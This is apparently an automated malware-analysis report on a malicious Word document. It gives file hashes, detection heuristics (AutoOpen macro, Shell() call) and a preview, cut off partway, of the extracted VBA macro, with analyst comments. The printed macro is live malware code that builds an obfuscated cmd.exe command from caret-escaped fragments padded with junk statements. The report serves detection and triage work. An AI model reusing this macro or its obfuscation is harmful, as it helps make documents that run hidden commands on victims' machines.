Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c030aaacd17be36d…

MALICIOUS

Office (OLE)

85.1 KB · Created: 2018-08-29 21:47:00 · Authoring application: Microsoft Office Word · First seen: 2018-11-05
MD5: a3366249ceb9fce439948f22ae9435ce SHA-1: 79ac5acdb30e3835719ac6a3e7b83f100805cf51 SHA-256: c030aaacd17be36d96cf691364799cf02a047b17e8969daa4a46425d67fabdec
Risk score: 202

Heuristics 6

  • ClamAV: Doc.Malware.Generic-6668018-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6668018-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA project contains a call to Shell(), which launches an external command line from within the document.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen macro, which Word runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8286 bytes
SHA-256: 37535881971c429006013649d5f83f8c3df56f6b7f8a9af9993fd95b2c3646a6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iSdjSRmNQOkTwv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as emitted by the olevba extraction: a document class module
' (VB_Base = "1Normal.ThisDocument") carrying the random-looking name
' "iSdjSRmNQOkTwv". No procedure body follows before the next module in this
' preview, so the AutoOpen entry point reported as OLE_VBA_AUTOOPEN is not
' visible in this excerpt.

Attribute VB_Name = "TXzCzHDQcMfERI"
' Second module (random-looking name) holding the string-building functions
' ZuWSifwo and NEJctbE that follow. No Option Explicit is declared before
' the first procedure, so the never-assigned names used in the junk `Hour`
' statements are implicit Variants rather than compile errors.
' ZuWSifwo(): takes no arguments and returns one string assembled from nine
' fragment variables (see the assignment just before End Function). It reads
' no document state.
'
' Analyst notes (static read of this excerpt only):
'  - `On Error Resume Next` is split across four physical lines with `_`
'    line continuations; once it executes, every later runtime error in this
'    function is silently ignored.
'  - The bare `Hour ...` statements call Hour() on arithmetic over names that
'    are never assigned anywhere in this function and discard the result.
'    They do not feed the return value (only the nine string variables do),
'    so they are junk/padding statements, presumably for signature evasion.
'  - `Chr(1 + 2 + 2 + 2 + 27)` is Chr(34), the double-quote character.
'  - The fragments are dense with `^`, the cmd.exe escape character, and the
'    first one begins `md /V/C"` — consistent with a cmd.exe command line
'    using /V delayed expansion. The leading "c" of "cmd" is not in this
'    function; presumably a caller outside this excerpt prepends it. With
'    carets removed the first fragment reads as a cmd.exe `set` of an
'    environment variable followed by a long payload, which is not decoded
'    here.
'  - The report's OLE_VBA_SHELL finding indicates a Shell() call elsewhere
'    in the project; its argument is not visible in this excerpt.
'  - Triage/detection handles: split `On Error Resume Next`, Chr() arithmetic
'    producing a quote, caret-laden string fragments, and unreferenced `Hour`
'    junk are all obfuscation markers worth a rule.
Function ZuWSifwo()

On _
Error _
Resume _
Next
Hour 3535 / jABRD
   Hour ZfBVqm * BvSYX
   Hour wPSoj / WYdId
' First fragment: cmd.exe switches and an opening quote via Chr(34).
skfUwOlpPH = "md /V/" + "C" + Chr(1 + 2 + 2 + 2 + 27) + "^s^e^" + "t N^Y" + "^GD" + "==A^" + "A^" + "I^AAC^A" + "^gA^A^" + "I^A^"
Hour 59300 * lKwlI / wdOIY / KEtKsR
MsolBSWtSFo = "AC^A" + "g^A" + "A^" + "IA^AC" + "^AgA"
Hour IhwQj / EAwwTi
   Hour ZVvIjd * ZwIHKp / 23328 / OUSooT
   Hour 60580 / 75695
   Hour 78812 * DUNZS * 38088 * XUYdb
   Hour 88956 / rKzpd * 14510 * KoKAs
pkzJYPl = "AI^AAC" + "^A^" + "g^AAIAA" + "C^A" + "g" + "^" + "AAIA^A" + "C" + "^A^9BQ" + "f^A"
Hour jYjjdF * 29626
   Hour Gcujq / jGPNK * qDLpN / VOGnE
nwcfC = "s" + "H^AoBwY" + "^A" + "^QH^A" + "^hBw^Y^" + "A^0^H^" + "A^" + "7^A" + "^w^a"
Hour nztZBw * sfbDDB * RFpjLJ * 8107
   Hour AwuUCs / YJEEU * hPNOC * 4204
   Hour UUrQBt / TTYtL / QmLuK * pSuHk
fVSnJDbJYs = "^A" + "EGA^lB" + "gcA^IG^" + "A" + "7^AQ^d" + "^"
Hour 83302 * JOfRE
   Hour TskBa * NGYHFB
   Hour 88165 / viMlK * qJSYM / bZjqX
nuwwERzibL = "AIH" + "^A^EB" + "^AJA" + "AC" + "^A" + "t^BQ^ZA" + "QHA" + "^" + "J^B^Q"
Hour 51304 / CDicQq
   Hour ifioM / wvjwJL / ZHiIR / EwrDw
   Hour utQiwJ / frfSu
   Hour 67421 * dNVmh
wEqqrHnwA = "^L" + "AUGAr" + "B^" + "w" + "^bAY^" + "HAu^B" + "^Q^" + "S^As^" + "D" + "^A" + "^p" + "^AQd^"
Hour 87232 / lPWmA * 38548 / XCshLK
   Hour vHzjjw / WkRUsV
   Hour 26165 * XkSrb * 73469 / llwrz
buhOr = "A" + "IH" + "^AEB^A" + "^JAAC^" + "As" + "^Aw^a^A" + "kG^A^" + "H^B" + "^A^J^" + "AgCAlB"
Hour 50722 * fiQSc
   Hour 62409 * VHsFK / JJwLz / EBCrwi
   Hour 97818 / NAzNPw
PzCdjzt = "^Ab" + "^A" + "kGA" + "^G^BAZ" + "AEG" + "AvB" + "^A^bA^4" + "^G^A3" + "Bw^b" + "^AQE^A" + "^uA^Q^a" + "^A^0"
' Return value: all nine fragments concatenated in assignment order; the
' trailing Hour statements after this line contribute nothing.
ZuWSifwo = skfUwOlpPH + MsolBSWtSFo + pkzJYPl + nwcfC + fVSnJDbJYs + nuwwERzibL + wEqqrHnwA + buhOr + PzCdjzt
   Hour 28888 / wNcEIc
   Hour 96030 * iUNXYh / 59113 / GusvU
End Function
Function NEJctbE()

On _
Error _
Resume _
Next
Hour sJdMTM * odfPr
   Hour 25991 / 99018 * ZSdOw * IXFlzE
   Hour QGmIJ * oUFFWf
   Hour 90886 * PUlYqq
   Hour 15626 * lRIsVZ
RrunN = "GA^" + "GB^" + "AJAsH" + "^" + "A5^Bg" + "cA^Q^HA" + "^7B^QK" + "^A"
Hour 22041 * GnYzOI / FnbcG / SmaUrj
XQPkSqZS = "^sG^AW" + "^B^wSA" + "QC^A" + "^gAg" + "b^A"
Hour 75316 * WjtEHa
   Hour IwJBYq * XjmFh
   Hour 1766 / 2702
   Hour zPAFH / OODsUm
   Hour 17343 * zzRMXb
GtNTiw = "^kG" + "^AgA^w" + "^aA^" + "kGAHBAJ" + "A^gCA^o" + "^BwY^" + "AE^G^" + "Al^BgcA" + "^8G" + "A^" + "m" + "^Bw^O^" + "AcCAl^B"
Hour ohCzR * ZFVlO
   Hour rPqdm / 55455
   Hour 98819 / 51132 / irfKo * MrVjB
zpKuIs = "Ae" + "A" + "U^G^A" + "^uAw" + "JAsCA1" + "^Bw^" + "QAoH^" + "AkA^" + "wKAcCA"
Hour 80543 / tNvZtp
   Hour wGKuz * 66681
MocpUVD = "cBw" + "J" + "A^" + "sC^" + "A^j^BQ" + "aA^w" + "^G^A" + "i" + "B^Qd^" + "A^AH^"
Hour 3244 * 15000
   Hour 96896 / JlVpfP
   Hour AzCwj / zkBOMG * 31057 * wvPlL
mUJFVGbHEY = "A^6^Ag^" + "d^A" + "4^GAl^B" + "^AJ^" + "A0^" + "DA^1B" + "gcAQ" + "^" + "E^" + "AkA^" + "w" + "O" + "^AcCA"
Hour 28874 / SdsdEz * iEwSSt / EOarc
   Hour 15307 * KlwoU
   Hour wwaUH / hPOip * aQVpjj / LALSN
   Hour 90849 / pOzXj
fldhGUbZKz = "^2^" + "Ag^M^" + "AUD^A" + "nAAIA^" + "0^D^" + "Ag^" + "A^Qd^A^"
Hour iRIzo * PqRcfS
jRYrPk = "MEA6B^A" + "^JAsD^" + "ApA^wJ^" + "AA^E" + "AnA" + "^A^" + "KA^QHA" + "p^B^A" + "bA^AH^A" + "T" + "B^g^" + "L^A" + "cC^A"
Hour jXiRqV / PwqXY
   Hour aLDdQ / qfwEQz * ZkZbH / DEsBV
   Hour 68973 / lUAkz
   Hour 48237 / 88099 * 21267 * jVnjM
oqkpohlcD = "^0B" + "g^eAU^" + "FA^3" + "^B" + "wTA^" + "8CA" + "t^Bw^bA" + "MGA" + "^u^A"
NEJctbE = RrunN + XQPkSqZS + GtNTiw + zpKuIs + MocpUVD + mUJFVGbHEY + fldhGUbZKz + jRYrPk + oqkpohlcD
   Hour OMFiY / rSHlf * AvZdll / iKhCw
   Hour
... (truncated)